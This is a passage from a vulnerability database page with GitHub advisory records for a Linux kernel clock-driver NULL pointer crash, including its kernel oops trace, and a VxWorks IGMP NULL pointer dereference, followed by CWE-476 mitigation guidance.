: __clk_register+0x1d8/0x820\n[ 0.308273] sp : ffffffc01111b7d0\n[ 0.312438] x29: ffffffc01111b7d0 x28: 0000000000000000 x27: 0000000000000040\n[ 0.315919] x26: 0000000000000002 x25: 0000000000000000 x24: ffffff8000308800\n[ 0.323037] x23: ffffff8000308850 x22: ffffff8000308880 x21: ffffff8000308828\n[ 0.330155] x20: 0000000000000028 x19: ffffff8000309700 x18: 0000000000000020\n[ 0.337272] x17: 000000005cc86990 x16: 0000000000000004 x15: ffffff80001d9d0a\n[ 0.344391] x14: 0000000000000000 x13: 0000000000000000 x12: 0000000000000006\n[ 0.351508] x11: 0000000000000003 x10: 0101010101010101 x9 : 0000000000000000\n[ 0.358626] x8 : 7f7f7f7f7f7f7f7f x7 : 6468626f5e626266 x6 : 17000a3a403c1b06\n[ 0.365744] x5 : 061b3c403a0a0017 x4 : 0000000000000000 x3 : 0000000000000001\n[ 0.372863] x2 : 0000a00000000000 x1 : 0000000000000001 x0 : ffffff8000309700\n[ 0.379982] Call trace:\n[ 0.387091] clk_core_get_parent_by_index+0x68/0xec\n[ 0.389351] __clk_register+0x1d8/0x820\n[ 0.394210] devm_clk_hw_register+0x5c/0xe0\n[ 0.398030] devm_clk_register_regmap+0x44/0x8c\n[ 0.402198] qcom_cc_really_probe+0x17c/0x1d0\n[ 0.406711] qcom_cc_probe+0x34/0x44\n[ 0.411224] gcc_ipq8074_probe+0x18/0x30\n[ 0.414869] platform_probe+0x68/0xe0\n[ 0.418776] really_probe.part.0+0x9c/0x30c\n[ 0.422336] __driver_probe_device+0x98/0x144\n[ 0.426329] driver_probe_device+0x44/0x11c\n[ 0.430842] __device_attach_driver+0xb4/0x120\n[ 0.434836] bus_for_each_drv+0x68/0xb0\n[ 0.439349] __device_attach+0xb0/0x170\n[ 0.443081] device_initial_probe+0x14/0x20\n[ 0.446901] bus_probe_device+0x9c/0xa4\n[ 0.451067] device_add+0x35c/0x834\n[ 0.454886] of_device_add+0x54/0x64\n[ 0.458360] of_platform_device_create_pdata+0xc0/0x100\n[ 0.462181] of_platform_bus_create+0x114/0x370\n[ 0.467128] of_platform_bus_create+0x15c/0x370\n[ 0.471641] of_platform_populate+0x50/0xcc\n[ 0.476155] of_platform_default_populate_init+0xa8/0xc8\n[ 0.480324] do_one_initcall+0x50/0x1b0\n[ 0.485877] kernel_init_freeable+0x234/0x29c\n[ 0.489436] kernel_init+0x24/0x120\n[ 0.493948] ret_from_fork+0x10/0x20\n[ 0.497253] Code: d50323bf d65f03c0 f94002a2 b4000302 (f9400042)\n[ 0.501079] ---[ end trace 4ca7e1129da2abce ]---",
"id": "GHSA-wx79-2q2c-86qm",
"modified": "2025-09-23T21:30:54Z",
"published": "2025-09-23T21:30:53Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-47647"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/41e360fa73a4c2f5b78f5ded78a5375b08c206a5"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/5a5576ad405c3c89fc9afb245c4dcc3e412b0aa9"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/8b89c9e68a01a19a1dd689a42aa65d545e931899"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/bf8f5182b8f59309809b41c1d1730ed9ca6134b1"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/d02b3d4a8c525068bc5cfb4341e0023d8eb82ace"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-WX88-MGVP-V85P
Vulnerability from github – Published: 2022-05-24 17:16 – Updated: 2022-05-24 17:16The IGMP component in VxWorks 6.8.3 IPNET CVE patches created in 2019 has a NULL Pointer Dereference.
{
"affected": [],
"aliases": [
"CVE-2020-10664"
],
"database_specific": {
"cwe_ids": [
"CWE-476"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2020-04-27T13:15:00Z",
"severity": "MODERATE"
},
"details": "The IGMP component in VxWorks 6.8.3 IPNET CVE patches created in 2019 has a NULL Pointer Dereference.",
"id": "GHSA-wx88-mgvp-v85p",
"modified": "2022-05-24T17:16:33Z",
"published": "2022-05-24T17:16:33Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-10664"
},
{
"type": "WEB",
"url": "https://support2.windriver.com/index.php?page=cve\u0026on=view\u0026id=CVE-2020-10664"
}
],
"schema_version": "1.4.0",
"severity": []
}
Mitigation MIT-56
For any pointers that could have been modified or provided from a function that can return NULL, check the pointer for NULL before use. When working with a multithreaded or otherwise asynchronous environment, ensure that proper locking APIs are used to lock before the check, and unlock when it has finished [REF-1484].
Mitigation
Select a programming language that is not susceptible to these issues.
Mitigation
Check the results of all functions that return a value and verify that the value is non-null before acting upon it.
Mitigation
Identify all variables and data stores that receive information from external sources, and apply input validation to make sure that they are only initialized to expected values.
Mitigation
Explicitly initialize all variables and other data stores, either during declaration or just before the first usage.
No CAPEC attack patterns related to this CWE.